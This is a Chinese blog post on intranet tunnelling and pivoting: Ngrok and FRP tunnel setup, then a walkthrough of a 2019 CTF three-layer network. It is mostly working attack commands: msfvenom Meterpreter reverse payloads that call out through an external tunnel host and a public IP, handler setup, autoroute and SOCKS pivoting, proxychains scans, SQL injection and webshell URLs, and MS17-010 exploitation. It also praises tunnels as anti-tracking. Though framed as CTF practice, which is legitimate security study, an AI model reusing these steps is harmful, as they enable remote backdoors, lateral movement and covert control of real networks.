内网安全-隧道穿透漫游(二)
Sock代理常用工具:Sockscap&Proxifier&Proxychains
目标:旨在代理连接肉鸡后实现本地渗透肉鸡网络架构。
Linux:Proxychains
Windows:Sockscap Proxifier
穿透平台:Ngrok Frp Nps(麻烦)
优点:穿透加密数据,中间平台,防追踪,解决网络问题
实验环境:两个不同的内网(有网络)实现穿透控制。
Ngrok使用流程:
1.注册-购买-填写-确认http://www.ngrok.cc/
协议:http 本地端口:192.168.46.131:80
2.测试:内网1执行后门-免费主机处理-内网2监听-内网2接受器
./sunny clientid 7e543d3efc295766 //控制端连接Ngrok的服务器
msfvenom -p windows/meterpreter/reverse_http lhost=xxxx.free.idcfengye.com lport=80 -f exe -o test.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.46.131
set lport 80
exploit
FRP简述:自行搭建,方便修改,成本低,使用多样化。
FRP使用流程:
1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)
服务器修改配置文件frps.ini:
[common]
bind_port = 7000
启动服务端:
./frps -c ./frps.ini
2.控制端-下载-解压-修改-启动
控制端修改配置文件frpc.ini:
[common]
server_addr = 47.94.236.117
server_port = 7000 #frpc工作端口,必须和上面frps保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 #转发给本机的5555
remote_port = 6000 #服务端用6000端口转发给本机
启动客户端:
./frpc -c ./frpc.ini
msfvenom -p windows/meterpreter/reverse_tcp lhost=your_ip lport=6000 -f exe -o frp.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit
CFS三层内网漫游演练测评-某CTF2019
来源2019某CTF线下赛真题内网结合WEB攻防题库,涉及WEB攻击,内网代理路由等技术,每台服务器存在一个Flag,获取每一个Flag对应一个积分,获取三个Flag结尾。
Target1:
探针目标-利用WEB漏洞(TP5_RCE)-获取webshell权限-获取Flag-Target2
1.生成后门:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.46.131 LPORT=1111 -f elf >t1.elf
2.接受反弹:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.46.131
set LPORT 1111
exploit
3.信息收集及配置访问
获取网络接口:run get_local_subnets
查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.22.0/24
开启本地代理:(创建SOCK5协议代理)
use auxiliary/server/socks5
set srvport 2222
exploit
4.利用本地代理接口访问测试
设置浏览器代理进行访问测试
linux:
配置proxychains后调用工具探针Target2
/etc/proxychains.conf
socks5 192.168.46.131 2222
proxychains nmap -sT -Pn 192.168.22.0/24 -p80
-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护。
-sT:扫描TCP数据包已建立的连接connect
windows:
利用代理工具Proxifier或SocksCap64载入代理进行进程访问测试
Target2:
探针目标-利用WEB漏洞(SQL注入)-后台获取webshell权限-获取Flag-Target3
http://192.168.22.128/index.php?r=vul&keyword=1 #sql注入
http://192.168.22.128/index.php?r=admini/public/login #后台
http://192.168.22.128/index.php?r=special #后门shell
1.生成正向后门:
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf
2.访问接受:
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.128
set LPORT 3333
exploit
3.信息收集及配置访问
获取网络接口:run get_local_subnets
查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.33.0/24
Target3:
探针目标-端口及漏洞扫描-利用MS17010获取系统权限-获取Flag-GG
proxychains nmap -Pn -sT 192.168.33.33
use auxiliary/scanner/smb/smb_ms17_010 //判断漏洞
use exploit/windows/smb/ms17_010_psexec //验证漏洞
set payload windows/meterpreter/bind_tcp //正向连接
set RHOSTS 192.168.33.33 //攻击目标
set RHOST 192.168.33.33 //连接目标
exploit
shell
dir /S flag.txt /B
type C:\Users\Administrator\Desktop\flag.txt
思维导图补充:内网-信息收集&不出网上线CS&正反向&端口转发 - 完全免费的思维导图软件 - 知犀官网知犀官网在线思维导图工具提供:思维导图在线制作,并提供思维导图文件大纲、分享、下载、云存储等实用功能。https://www.zhixi.com/view/bd6fcf39
内网安全-隧道穿透漫游(二)相关推荐
- 【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议
前言: 介绍: 博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章). 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edus ...
- 【内网安全-隧道搭建】内网穿透_Ngrok上线(美版、国版二开)
目录 一.准备 1.意义: 2.项目: 二.内网穿透 1.简介: 三.Ngrok(入门上线) 1.简述: 2.Ngrok入门上线(国版二开) 3.相关工具: 2.Ngrok入门上线(美版) 一.准备 ...
- 【内网安全-隧道搭建】内网穿透_Frp上线、测试
目录 Frp(简易上线) 1.简述: 2.工具: 3.使用: 1.准备: 2.服务端(公网): 2.客户端(内网): 3.测试方法: 4.生成后门木马监听: Frp(简易上线) 1.简述: 1)Frp ...
- 内网端口 转发 穿透 工具简介
目录 一.LCX 1.lcx 内网端口转发(类似于SSH远程转发-R) 2.本地端口转发(类似于SSH本地转发-L) 二.nc反弹 正向连接 反向连接 三.socks代理工具 (1)Earthworm ...
- 使用frp配置内网访问(穿透)教程(超详细,简单)
1 Frp介绍 frp 是一个开源.简洁易用.高性能的内网穿透和反向代理软件,支持 tcp, udp, http, https等协议.frp 项目官网是 https://github.com/fate ...
- 内网安全-隧道技术-防火墙限制协议绕过-文件传输
隧道技术: 一种通过使用互联网络基础设施在网络之间传递数据的方式,包括数据封装. 传输和解包在内的全过程.使用隧道传递的数据(或负载)可以是不同协议的数据帧或包. 封装: 隧道协议将这些其他协议的数据 ...
- qq 实现连接内网_如何穿透内网稳定进行远程桌面?花生壳盒子来搞定
内网的电脑访问,一直都是一个比较麻烦的问题,虽然可以通过路由器来设置,但是对于很多用户来说,那繁琐的设置,简直就跟天书一样,劝退效果一流.笔者从事IT行业,内网穿透笔者有需求,笔者的很多客户也有这样的 ...
- 内网渗透—红日安全vulnstack(二)
文章目录 1. 环境说明 2. 开启靶场 3. 外网渗透 3.1 端口扫描 3.2 拿shell 3.2.1 CVE-2019-2725 3.2.2 MSF17-010 3.3 提权 4. 内网渗透 ...
- 腾讯云动态公网IP绑定域名实现内网服务器公网穿透
公众号推广: 目前CSDN进行VIP可见,文章可在微信公众号进行免费的阅读. 文章内容经过认证实践,比较的清晰易懂,适合初次接触的人员. 请关注微信公众号:菜鸟编程踩坑之路,进入公众号搜索关键词 内网 ...
- 海康威视 + 搭配内网穿透,搭建远程视频监控教程
一.注册网云穿帐号 1. 通过网云穿控制台进行帐号注册,控制台网址:i.xiaomy.net 注册成功后会免费赠送一个免费的二级域名(已备案) 2. 填写注册信息 二.搭建监控系统 内网搭建好监控系统 ...
最新文章
- C# Idioms: Enum还是Enum Class(枚举类)
- R语言基于模拟退火(Simulated Annealing)进行特征筛选(feature selection)
- Struts2后期(这框架目前正处于淘汰状态)
- Java架构师在线视频,架构师的7大必备技能
- faster rcnn的测试
- 如何在六个月或更短的时间内成为DevOps工程师(三):版本控制
- sql server 并发_并发问题– SQL Server中的理论和实验
- cenyos7安装 yum不可用_centos7安装fabric
- ubuntu查看 固态硬盘位置_Linux的硬盘使用情况、挂载、SSD挂载(查看df -h不能看到的卷)...
- 《云周刊》69期:开门红利!阿里云2月活动来袭
- 239.滑动窗口的最大值
- C语言程序设计第五版第五章课后习题
- 用spss进行数据的标准化处理_SPSS统计分析案例:数据标准化
- 微信隐藏功能系列:微信朋友圈三天可见怎么设置?
- python在股市有什么作用_一颗韭菜的自我修养:用Python分析下股市,练练
- 关于全连接层 fully connect
- javaScript快速入门(仅需一天)
- 苹果电脑如何设置开启远程控制?
- 网络舆情相关书籍推荐
- java基础案例4-2饲养员喂养动物
热门文章
- 单片机定时器一1ms12MHz_51单片机CPU结构各部件的原理详细分析
- js中.getMonth() 获取月份比实际月份少一个月
- 浅析Servlet中的四大作用域
- DC学院数据分析师(入门)学习笔记----高级爬虫技巧
- android平板和ipad区别,iPad和安卓平板差距大吗?亲身经历告诉你,平板该如何挑选...
- 299美元企业级账号申请过程
- 客户体验的时代(2001.12)
- 逆火效应:该对谁负责?
- 基于java springboot的图书管理系统设计和实现
- 2020年7月19日训练总结